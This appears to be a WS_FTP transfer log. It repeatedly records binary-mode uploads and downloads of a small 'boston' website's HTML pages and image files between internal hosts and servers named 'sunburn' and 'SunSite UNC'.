10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
